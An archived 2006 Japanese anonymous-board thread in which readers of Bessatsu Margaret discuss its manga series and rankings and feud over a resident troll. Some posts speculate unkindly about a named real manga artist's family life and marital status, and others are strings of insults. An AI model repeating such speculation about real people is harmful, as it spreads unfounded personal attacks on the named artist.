そこ、もうずっと使われてないしなぁ…
以前使ってた時も、新規さんなのかわからんけどこっちに書き込む人多くて結局さびれちゃったんだよね
今sageにこだわってごねてるのってどうせ婆本人だけだろうし
しばらくこっちでage進行でやればよいと思う
前にage進行だった時も、婆がゴネる以外は別に荒らしなんて来なかったし

これだけでは微妙なので。
苺の絵が見やすくなってて驚いた
前はかわいいけど線とか太くて見づらかったのに

85 :花と名無しさん:2006/12/15(金) 13:21:05 ID:???0
>84
何ageで一人で自演してるのよ。
もしかして二人いるとしてもそれでも自演でしょ?
友達でも動員してるんでしょ

>82
sage友達に申し訳ないけど、どうして?
WATええじゃん。かわいいし、人気だし。
中原さんが描くの?彼女はジャニ同人誌出すくらいだから
面白いの描くかもよ。

86 :花と名無しさん:2006/12/15(金) 13:21:24 ID:???0
>>84
避難所から出てくるなカス

87 :花と名無しさん:2006/12/15(金) 13:32:03 ID:???0
はい>>83法則発動。河原たった一人のために別マお買い上げー。
晒し上げ。

>>84
そこは河原厨が作ったサイトだから当然河原のことは悪く書けない。
いくえみ、椎名、苺も悪く書けない。
そんなとこが機能するわけが無いでしょ・・・
二ちゃんで自演みたいなバカをせずに河原のファンサイトでも
立ち上げればいいのに、どうせ人も来ないし二ちゃんで世論操作してた
方が効率がよさそうだからって。

河原が生き残ったって別マが80万部(90年代)→23万部(いま)
ですからー、残念でしたーーーww
作家は責任取らなくていい?あっそww

88 :花と名無しさん:2006/12/15(金) 13:36:08 ID:LGOg6uoY0
★必読★
このスレには、特定の漫画家を中傷する荒らしが常駐しています。
※荒らし(通称:別婆)の特徴
・「sage」で書き込む(IDが???) →自演しやすくなる
・「。。。」を語尾につけていた
・他人を装ったり、ハンドルネームを入れる
・長文で批評(特定漫画家を執拗に貶す/スレで叩かれている漫画家を無理やり持ち上げる)
・連続で投稿・深夜早朝覚醒
・自作自演
・「sage進行にしよう」と言う
★以上のような特徴のある書き込みには、絶対にレスをしないでください。
反応するあなたも荒らしです。
★ID表示推奨。メール欄を空欄にするとIDが出ます。

別婆の特徴
・河原和音がとにかく嫌いらしく執拗に粘着に叩く。きら・和田・永田・椎名・中原なども嫌い。
 特に嫌いでなくても、スレで人気が出ると必死で叩きだす。
・スレで叩かれ気味だと、自分は好きでもないのに何故か必死に
 擁護をしだす(例 山川あいじ・ふるかわしおり)
・自分の嫌いな漫画家を少しでも褒める奴は、全員編集部や関係者だと思い込んでる。
漫画家は枕営業で仕事を取ってると、下品な妄想を巻き散らかす。
・一日中張り付いてるが、丑三つ時〜早朝やお昼時によく自作自演の連投を繰り返す。


89 :花と名無しさん:2006/12/15(金) 13:44:20 ID:7t9UutTYO
別婆って本当にテンプレ通りなんだね…


90 :花と名無しさん:2006/12/15(金) 13:49:21 ID:???0
ずーっとagaってる。キモイ!!

91 :花と名無しさん:2006/12/15(金) 13:53:37 ID:???0
立ち読み派だけど
君に、今回みじかくね?
いつもの半分くらいしかなかった
さては原稿落としたのか

92 :花と名無しさん:2006/12/15(金) 14:04:21 ID:???0
椎名さんのお父様が亡くなったんだよそれで描けなかったらしい。
椎名さんて家族の仲あまり良くなさそう。オビでも
自分や友人の話しかしないし。

河原もなんだよね。家族の話は妹の話しかしない。
親子仲いいわけないか。娘が同人紙活動にのめりこんでプロになって、
結婚もせず、お金はちょっとはもってるかもしれないけど
世間とはズレた感覚と思考で話も合わず、35にもなって子供もおらず
妹に子供いるからいいのか・・・でも親戚にもなんといって説明して
いいのやら・・・
もしかして河原さんて家族の中では邪魔者扱いなのかも。
だから河原のほうでも親とあまり接しないものだから
年配の登場人物をうまく描けず、作品も新人漫画家が描いたものと
大差なく、いつまでたっても薄いまま。
多田さんだったら琴子のお父さんとかお母さんとかいい味出してたなあー、
多田さんが亡くなった年齢に近くなってるのに、
人格的にも技術的にもあまりにレベルが違いすぎる・・・

93 :花と名無しさん:2006/12/15(金) 14:17:13 ID:???0
        点数
[表紙]     [120]

連載
[巻頭・バンビ]  [580]
[デビュー]    [ 0(※)]
[キャット]    [10230]
[君に届け]  [  2(※)]
[BODY]    [4040]
[紅色]    [5200]
[恋カタ]    [8300]
[ファイブ]    [6080]

読切
[春が・藤戸]  [2560]
[ラブ・登尾 ]  [4305]
[バリバリ・広瀬] [1280]
[ルーキー・外山]  [990]
ショート&ギャグ
[のろい]    [200]
[家族]     [550]
[執事]     [612]
[超]      [680]

■読者葉書一枚につき一点とします。
■(※)は危険レベルの低人気。連載終了を検討のこと。

ファンの人は投票しないと連載終了検討になってしまいますよ・・・
なんちて。

94 :花と名無しさん:2006/12/15(金) 14:19:50 ID:???0
>>91-92
同一人物としか思えない・・・

95 :花と名無しさん:2006/12/15(金) 14:29:33 ID:???0
>[デビュー]    [ 0(※)]
なんかワロタ。ありえないとは知りつつも。
実際0とかだったらどうなるんだろ、即終了?


96 :花と名無しさん:2006/12/15(金) 14:42:19 ID:???0
w

97 :花と名無しさん:2006/12/15(金) 14:45:21 ID:ObjAb0aG0
皿仕上げ

98 :花と名無しさん:2006/12/15(金) 14:54:07 ID:7t9UutTYO
2:花と名無しさん :2006/12/13(水) 19:24:53 ID:CaOGOr+X0
★現在、スレが粘着に荒らされているため、避難所を設けています。
まともな会話ができないときはこちらへ。
ttp://jbbs.livedoor.jp/comic/3217/ (PC用)
ttp://jbbs.livedoor.jp/bbs/i.cgi/comic/3217/ (携帯用)


★必読★
このスレには、特定の漫画家を中傷する荒らしが常駐しています。
※荒らし(通称:別婆)の特徴
・「sage」で書き込む(IDが???) →自演しやすくなる
・「。。。」を語尾につけていた
・他人を装ったり、ハンドルネームを入れる
・長文で批評(特定漫画家を執拗に貶す/スレで叩かれている漫画家を無理やり持ち上げる)
・連続で投稿・深夜早朝覚醒
・自作自演
・「sage進行にしよう」と言う
★以上のような特徴のある書き込みには、絶対にレスをしないでください。
反応するあなたも荒らしです。
★ID表示推奨。メール欄を空欄にするとIDが出ます。


99 :花と名無しさん:2006/12/15(金) 15:05:02 ID:???0
ID:7t9UutTYO
朝からこんなスレに携帯で常駐って痛いと思うよ

100 :花と名無しさん:2006/12/15(金) 15:11:27 ID:7t9UutTYO
自覚してるんでお構いなく。


101 :花と名無しさん:2006/12/15(金) 15:45:02 ID:FAJmdn7IO
別婆はなんでそんなに河原さんが嫌いなの?

102 :花と名無しさん:2006/12/15(金) 15:49:15 ID:ZHsQelj/O
内容微妙だよね。

デビューとキャットと恋カタと君には面白かった

103 :花と名無しさん:2006/12/15(金) 16:11:27 ID:???0
ID:7t9UutTYO
この人、朝からずっといるね。
勉強するか働けばいいのに

104 :花と名無しさん:2006/12/15(金) 16:13:05 ID:???0
何このスレ
携帯率高っ

105 :花と名無しさん:2006/12/15(金) 16:36:08 ID:gRWWOH02O
>>93ボディーに4000点以上入ってるのに驚いたwwww



あげもさげもすきにすればいいんじゃない?

106 :花と名無しさん:2006/12/15(金) 16:54:28 ID:???O
そうだよね(・_・)

107 :花と名無しさん:2006/12/15(金) 17:00:24 ID:???O
ていうか完璧に別婆に乗っとられてるね、このスレ。
恐らく半分以上は婆のレスでしょ?
しばらく避難所に移動するわノシ

108 :花と名無しさん:2006/12/15(金) 17:46:17 ID:gRWWOH02O
>>107勝手にドゾーてか半分も別婆にのっとられてないでしょ

109 :花と名無しさん:2006/12/15(金) 19:50:17 ID:???0
河婆って初めて見たんですが別婆が作り上げた
架空の存在ですか?

110 :花と名無しさん:2006/12/15(金) 22:48:13 ID:???0
>>93
恋カタの点数、高すぎじゃない?
427 くらいが妥当じゃないかなあー
それか、072点くらい

111 :花と名無しさん:2006/12/15(金) 23:17:15 ID:???O
>>93てか全体的に配点がおかしいと思う

112 :花と名無しさん:2006/12/16(土) 00:38:04 ID:???0
>>110
マジレスしないように、、、

113 :花と名無しさん:2006/12/16(土) 03:06:27 ID:???0
>>112
>>110は、恋カタにあわせて
427→氏にな
072→オナニー(ドリーム)
って点数つけてるのに!
42731→氏になさい だと、高い点数になるからつけなかったのに!

114 :花と名無しさん:2006/12/16(土) 12:21:05 ID:???0
十五年買い続けたけど今月を最後に買わないことにしました。
まともに読めるものが三分の一程度しかないし、もう立ち読みで十分。

さよならー。

115 :花と名無しさん:2006/12/16(土) 13:29:41 ID:???O
私は17年買い続けましたが、先月号でやめました。
「君に届け」しか見なくなったので、あとはコミックで楽しみます。


116 :花と名無しさん:2006/12/16(土) 13:31:53 ID:???0
私も31年買い続けましたが、今月号でやめます。
こむぎこしか見なくなったので、あとは立ち読みで楽しみます。

ファイブが終わったら戻ってくるかもネ

117 :花と名無しさん:2006/12/16(土) 13:40:08 ID:???O
みんないくつなんだろう?

>>116は釣りだよね…?
こむぎこって(゚д゚)

118 :花と名無しさん:2006/12/16(土) 15:02:36 ID:???0
恋カタ、キャット、紅色終わったら自分もバイバイしようかな

119 :花と名無しさん:2006/12/16(土) 17:31:34 ID:???0
椎名さん可哀想に・・
いろんな漫画が急展開になってる希ガス
でもキャット素直に読めた
デブーいらない

120 :花と名無しさん:2006/12/16(土) 19:24:37 ID:???0
なんか廃刊でもしそうな勢い

121 :花と名無しさん:2006/12/16(土) 19:57:35 ID:???0
別冊婆ーガレットにリニュするんだね

122 :花と名無しさん:2006/12/16(土) 21:31:17 ID:???0
河原は結婚してるでしょ?

123 :花と名無しさん:2006/12/16(土) 21:47:24 ID:O1s8WBWyO
私も恋愛カタログ終わったら読むのやめる

124 :花と名無しさん:2006/12/16(土) 23:30:12 ID:???O
とりあえず苺の連載にはついていく

125 :花と名無しさん:2006/12/17(日) 01:51:13 ID:AgkyaeoDO
ランキング
高校デビュー→5位

126 :花と名無しさん:2006/12/17(日) 02:12:51 ID:5qmNjd7lO
結局別婆がどんなにけなそうとデビューは人気だということが証明されました

127 :花と名無しさん:2006/12/17(日) 04:07:06 ID:QUPPaM+Z0
人気があるから余計にけなしたくなるのかな?>別婆
まあどんなに自演して貶したところで無駄なんだけどね
とことん虚しい人だね

登尾さん?って人、デビュー作載ってすぐに二作目載ったけど、
最近デビュー作が好評って人多いね
少年誌風の絵柄の人とか、おとうとくん(だっけ?)とかいうの描いた人とか
また本誌に来ないかなー

128 :花と名無しさん:2006/12/17(日) 05:25:56 ID:???0
高校デビュー面白いよ。

129 :花と名無しさん:2006/12/17(日) 08:48:24 ID:???0
愛笑 ってすごい名前だなぁ。愛を笑うのか

130 :花と名無しさん:2006/12/18(月) 00:16:37 ID:???0
絶賛してる人が多いけど、キャットってそんなに面白いか?自分は普通だなあ。
今回のいきなりの展開もびっくり。売れてく部分をもっと書いた方が面白かったんじゃないのか。

131 :花と名無しさん:2006/12/18(月) 03:29:11 ID:YIBRx6e9O
同意!
面白いけど売れてくのをみたかった

132 :花と名無しさん:2006/12/18(月) 06:09:46 ID:TlaFK70PO
売れて行く所を書いたらガラカメみたくなるから辞めたのかな?
けど3はちょっと空きすぎだね


133 :花と名無しさん:2006/12/18(月) 06:32:26 ID:???O
私本屋でバイトしてるけど売れていく別マ系の漫画はキャットと高校デビューと君に届けだよ
うちの本屋がそうなだけで他はどうか知らんけど

134 :花と名無しさん:2006/12/18(月) 08:08:52 ID:???O
他も大体そんなもんじゃないの?後はあいじ絵苺絵に憧れる投稿者があいじ、苺の漫画買ってく程度

135 :花と名無しさん:2006/12/18(月) 09:36:55 ID:???O
>>130
キャットより君に届けの方が絶賛されてない?

自分は君に届け面白いと思えないんだけど、
一般的にはこういうのが人気なのかなぁ?

136 :花と名無しさん:2006/12/18(月) 09:55:15 ID:???0
>>135
ハゲド
「君に〜」は設定があざとくて好きになれん
こんなんで感動してる人はよっぽどry

137 :花と名無しさん:2006/12/18(月) 10:50:30 ID:???O
君に届けの作者にたいしての別婆の攻撃のイタさに感動しました

138 :花と名無しさん:2006/12/18(月) 13:23:40 ID:???0
キャットの作者ってあんまりやる気なさそう。

139 :花と名無しさん:2006/12/18(月) 13:51:33 ID:???0
>125
どこのなんてランキング?
あなたが100冊とか大量購入したアマゾンとかのランキングじゃないの?
高校デビューって不思議にランクインするね。この漫画の
どこがいいのかさっぱりわからない。軽く読めるって人もいるけど
ばかばかしすぎ。リアル学生とかの方がもう少しましなこと考えてる
と思うんだけど・・・デヴーを他にたとえるなら学年誌に連載してる
他愛ない設定のギャグ漫画以下。季節のイベントとかも
盛り込み損ねたり季節感自体なかったり・・・軽い読み物としても不出来。
まあ、80万部から20万部に転げ落ちた雑誌での人気作品てことで。

コミックランキングでランクインする理由はわからない。
少年漫画を押しのけて少女漫画ごときがランクインするのも
わからない。売れてる数量を挙げてるランキングは皆無であり、
なんらかのインチキくさい方法で点数を出しているのでしょうけれど・・・

そういえば売れてる数量を提示せずランキングだけ出すとは
どんなインチキなんだといいたいです。ネットでいくつか
ランキングが見られるけど、出版社や問屋の意向にそった、
売り上げにつながるような作品に傷をつけないような
ランキングばかりではないかと・・・

140 :花と名無しさん:2006/12/18(月) 14:06:06 ID:83NtGZWN0
婆さん長文で遅レスみっともないよw

141 :花と名無しさん:2006/12/18(月) 14:24:14 ID:???0
今月どれだけ売れるんだろう
君に届けは面白いし、看板のひとつでしょうから
減ページは痛手じゃない?
20万部切ったりして。

142 :花と名無しさん:2006/12/18(月) 14:44:57 ID:???O
>>139長文で必死すぎwww別婆お疲れ様。もうこないでね

143 :花と名無しさん:2006/12/18(月) 17:28:40 ID:???0
若手さんたち頑張って。
とりあえず皆さん絵が汚な過ぎ。

144 :花と名無しさん:2006/12/18(月) 18:37:39 ID:???0
斬の方がまだ読めるよね

145 :花と名無しさん:2006/12/19(火) 00:46:15 ID:ln0QRXjyO
登尾の読み切り、スルーしてたけど読み返したら結構面白かった。
ただ絵が雑なのが残念だ。

146 :花と名無しさん:2006/12/19(火) 07:29:30 ID:HKdeodE/O
>>139
深夜のテレビの「ランク王国」だよ

147 :花と名無しさん:2006/12/19(火) 12:52:57 ID:???0
余裕の無い進行だから絵が汚いんでしょうか・・・
他のきれいな絵の雑誌はどうかわからないけど、
一ヶ月くらい前倒しに完成していてもいいかも・・・どうせ
季節感の無い漫画ばっかりだし、事件とかとかぶった内容でない
かぎり掲載中止は無いものとして。
そうなると原稿を落としてしまい半分掲載されなかったりという
こともなくなり、進行が遅れがちの作家は連載からはずすということも
できますね。
もうこの雑誌でデブーしたいとも思わないしいいんじゃないですか。

>146
ふーん・・・
残念ですけどやっぱりある程度売れてるんですね。

148 :花と名無しさん:2006/12/19(火) 16:27:20 ID:???O
>>146それ知ってる。スレチだけどパフェチックの作者がランク王国にランクインしたってかなり喜んでて見逃したからビデオ撮ってた人譲ってとかいってた。

149 :花と名無しさん:2006/12/19(火) 16:45:07 ID:EHHmyRoi0
ラブコン終わったし買う気無くなった。
てか今月号の「君に届け」短すぎ。
高校デビューのヨウさ、くますごくね?? 笑..


150 :花と名無しさん:2006/12/19(火) 17:17:53 ID:???O
>>149今更?笑

151 :花と名無しさん:2006/12/19(火) 19:58:26 ID:???0
           ┗0=============0┛
               \===========[_|_|_|_|_|_|_|_|_|_|_|_|_|_]===========/
            /三三三三三三三三三三三三三三三三三三三三\
                  0 │ |∞∞∞ |::|∞∞田田∞∞|::|∞∞∞ | ::|  0
            [二] | ::|       |::|┏━━━━┓|::|       | ::l [二]
◎○@※◎○@※. |□|.│ |┌┬┐ |::|┃/ >1 \┃|::| ┌┬┐| ::|. |□| ◎○@※◎○@※
ii|iiii|iiii|iiii|iiii|iiii|iiii|iiii| `)三(´| ::|├┼┤ |::|┃ ∧_∧ ┃|::| ├┼┤| ::|`)三(´il|iiii|iiii|iiii|iiii|iiii|iiii|iiii|
@※◎○@※◎○ | ::| | ::|└┴┘ |::|┃(´∀` ) ┃|::| └┴┘| ::| | ::|  @※◎○@※◎○
ii|iiii|iiii|iiii|iiii|iiii|iiii|iiii|li┏━━━━━┓|::|┃(.    つ┃|::|┏━━━━━┓ li|iiii|iiii|iiii|iiii|iiii|iiii|iiii|l
◎○@iiii※◎○@ ┣┳┳┳┳┳┫|::|┗━━━━┛|::|┣┳┳┳┳┳┫ ◎○@iiii※◎○@
ii|iiii|iiii|iiii|iiii|iiii|iiii|iiii|l ○    ●        ∫∬∫∬        ●    ○ ii|iiii|iiii|iiii|iiii|iiii|iiii|iiii|li
               ○○  ●●      iiiii iii ii iiii       ●●  ○○
           [ ̄ ̄] [ ̄ ̄]   ( ̄ ̄ ̄ ̄ ̄)    [ ̄ ̄] [ ̄ ̄]
                |_○_|  .|_○_|     |_____|     |_○_|  .|_○_|

    ∧_∧ ∧_∧ ∧_∧ ∧_∧ ∧_∧ ∧_∧ ∧_∧ ∧_∧ ∧_∧
    (    )(    )(,    )(,,    )    ,,)(    )(    )(,    )(^×^ ;)
   こんな糞スレたてたばっかりに……  ザワザワ そうだよな ザワザワ  ナムアミダブツ……

152 :花と名無しさん:2006/12/19(火) 21:04:10 ID:???O
>>151
通報しますた

153 :花と名無しさん:2006/12/19(火) 21:15:31 ID:???0
>>149-150
■(笑)ってかく奴 托イです。本当に嫌いです
http://comic6.2ch.net/test/read.cgi/gcomic/1166237060/


154 :花と名無しさん:2006/12/19(火) 21:34:26 ID:???O
>>153私は>>149の真似しただけだけどね

155 :花と名無しさん:2006/12/19(火) 23:58:58 ID:9Mciiejb0
>>145
登尾は、今回は急遽掲載だったからじゃないかね
君に届けが減ページだったからその穴埋めで
表紙には載ってるけど、先月号の予告には載ってないし

156 :花と名無しさん:2006/12/20(水) 04:25:20 ID:???O
>>144
そりゃ斬は面白いからな

157 :花と名無しさん:2006/12/20(水) 08:00:46 ID:uI0+9MZ90
http://players.music-eclub.com/?action=user_song_detail&song_id=133563
かなり上手い

158 :花と名無しさん:2006/12/20(水) 14:29:22 ID:???0
このマンガがすごい2007に色々ランクインしてたの見たから書いておくよ
2位が君に届け 10位高校デビュー 41位ラブコン 65位かの人や月
テーマ別イチオシ作品ガイドにはキャットストリートのことも載ってた

159 :花と名無しさん:2006/12/20(水) 20:42:23 ID:???0
河原和音のスレってどこ行ったの?

160 :花と名無しさん:2006/12/20(水) 21:40:18 ID:???0
>>159
http://comic6.2ch.net/gcomic/kako/

161 :花と名無しさん:2006/12/20(水) 22:56:52 ID:???O
>>159
別婆のオナニースレになってたから埋めて終了しました。

162 :花と名無しさん:2006/12/21(木) 01:37:47 ID:???0
ざまーみろって感じだよねww
普通、人気があれば厨が勝手にスレ立てるだろうに
誰も立てない=語りたくも無いって事かなww

163 :花と名無しさん:2006/12/21(木) 05:33:45 ID:???O
↑もー別婆また来たの?まだ河原恨んでんのかよ。もうこなくていーよ。てかくんな

164 :花と名無しさん:2006/12/22(金) 00:23:58 ID:UZ5yB4JB0
My Favorite GirlのDVD
20日のデイリーDVDランキングだと7位、21日は5位
これって売れてるんだろうか

165 :花と名無しさん:2006/12/22(金) 08:50:40 ID:???0
2ちゃんねる漫画大賞2006
http://comic6.2ch.net/test/read.cgi/csaloon/1166744048/l50

投票よろしく

166 :159:2006/12/23(土) 22:18:56 ID:???0
>>160
dクス
>>161
そうなの。
できれば立てたいんだけど需要ないんならやめた方がいい?


167 :名無しさん:2006/12/24(日) 00:12:24 ID:ITtXrqhJ0
うちは君に届けいいと思うな 
高校デビューもね。
登尾さんのはつまらない・・・

168 :名無しさん:2006/12/24(日) 00:16:05 ID:ITtXrqhJ0
キャットはなんか読んでるとイライラしてくる・・・
1巻は面白かったのに・・・

169 :花と名無しさん:2006/12/24(日) 00:26:41 ID:???0
キャットおもしろい。
でも3年後にはびっくりした。

170 :花と名無しさん:2006/12/24(日) 07:11:36 ID:???O
>>166スルーされてるしwww
別にいらないんじゃない?そんな語るようなこともないし、軽くここで盛り上がれば。まあデビューの話になると必ず婆が現れるけどさ

171 :花と名無しさん:2006/12/24(日) 21:56:22 ID:???0
つーか、河原のスレなんかいらねーよ!!
あっても100レスいかないうちに落ちるのが関の山

そりゃ、イブに彼氏もいない婆どもは
河原スレで蛇男モエーって書き込むぐらいしか脳がないんだろうけど
あははははははははははははははははははっはははははははは

172 :花と名無しさん:2006/12/25(月) 08:45:26 ID:???0
>そりゃ、イブに彼氏もいない婆どもは

イブのこんな↑時間に書き込みしてるのは別婆だけじゃん。
せつなくなりませんか?w


173 :花と名無しさん:2006/12/25(月) 09:04:17 ID:kZ1680N90
別婆、デビューが売れてるのを目の当たりにして
ご乱心だね
前スレはそこまで婆臭くなかったのにこのスレ

174 :花と名無しさん:2006/12/25(月) 12:11:25 ID:???O
彼女(彼?)がイヴの夜にご乱心レスをするのは毎年恒例です
今年は少ないし穏やかなほう

175 :花と名無しさん:2006/12/25(月) 12:52:44 ID:???O
別婆かわいそう(´・ω・`)

イブにひとりで淋しすぎて
狂っちゃったんだね。

176 :花と名無しさん:2006/12/25(月) 15:13:56 ID:???0
なにこれ。。。あたし三日くらい来てないんだけど。。。
なんか怖いくらい。

ついに今年も河原さんが別マから切られるのを見ることができなかった。。。
もはやベツマ自体憎いといっていい。河原さんみたいな作家がのびのび
仕事できる職場。。。なんというか言いようの無い不快感。
何もいいところがないのにそつが無いので、真ん中くらいの人気を
ずっと保ってる。でも他のが消えていく中でいまでは売れてるほうに
なってる。こんなものが売れてるほうってありえるの?で、本体は
25万部くらいしか売れてないって。。。
無能、ゲス、ゴキブリ、アンポンタン、低脳、アイデア無い、
センス無い、汚い、くさい、陰湿、バカ、あほ、チンドンヤ、
窓際、閑職、ボーナスカット。。。
ありとあらゆる汚い言葉がよくにあうベツマ。

そのどん底で這いずるクズ漫画誌の中での大人気、高校デブー。。。
もうたくさん、たくさんなんだよ。。。
誰かベツマを助けてー、このままじゃ来年もクズのままだよ。。。

177 :花と名無しさん:2006/12/25(月) 15:40:10 ID:???0
うっひゃー、マジ今知った。
ラブコンアニメ化おめーーーーーー・・・・・・・!○×Oo.Xyz・・??

高校デブーはならないの・・単行本がランクインするわりにはやはり
何かがごっそり欠けているって大人なアニメ関係者にはわかってるのね。
それならそれでよし。
おそらく深夜アニメと思われ。まっすぐにいこうみたいに
日本テレビあたりで深夜三時ごろにぽつんとやってたら
誰も見ません。さよーならー・・・
テレビ東京だと一気にオタクくさくなるけど・・・萌えとかいってる
ファンが増えそう。
ラブコンて特殊な設定な話だとおもうけど、そんな何度も映画化したり
アニメ化したりする価値あるんかね。謎・・・

178 :花と名無しさん:2006/12/25(月) 16:12:09 ID:???0
ちょっと病気なんじゃないかと思う

179 :花と名無しさん:2006/12/25(月) 16:41:43 ID:???0
>>176
>>177
この前から、思ってたけどニセモノやめてくんない?
。。。をわざとらしく多用したりすれば、別婆っぽくなると思ってんのか
知らないけど

前々スレぐらいでもアタシ言ったよねぇ
一体、何度アタシの評判落とせば気がすむのさ、いい加減にしろよカス
ゴキブリ!!お前の魂胆はお見通しなんだよ河婆!
ホントは河原大好きで仕方ないくせに、アタシのフリしてアンチ発言したり
アタシの評判落としたり
お生憎様、みーーーーーーーーーんな分かってますから、残念!!

180 :花と名無しさん:2006/12/25(月) 16:54:52 ID:???0
>残念!!
古い・・・(ノД`)

181 :花と名無しさん:2006/12/25(月) 23:56:26 ID:???O
どれがホントの別婆?
わからなくなってきた…

182 :花と名無しさん:2006/12/26(火) 00:51:55 ID:???0
おかしいレスは全部別婆だろ

183 :花と名無しさん:2006/12/26(火) 04:05:04 ID:???O
>>172
ワラタw

184 :花と名無しさん:2006/12/26(火) 07:17:01 ID:???0
昨日はクリスマスだったのに何やってんのあんたら

185 :花と名無しさん:2006/12/26(火) 16:38:02 ID:???0
別婆のマネなんてやろうと思ってもできるもんじゃないよww

186 :花と名無しさん:2006/12/26(火) 17:35:55 ID:???0
婆に朗報
ttp://dailynews.yahoo.co.jp/fc/computer/internet/?1167117947

187 :花と名無しさん:2006/12/26(火) 20:40:08 ID:???O
別婆って結局老投稿者なの?

188 :花と名無しさん:2006/12/28(木) 18:43:05 ID:???0
あーあ、ベツマももう終わりだね。

57 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)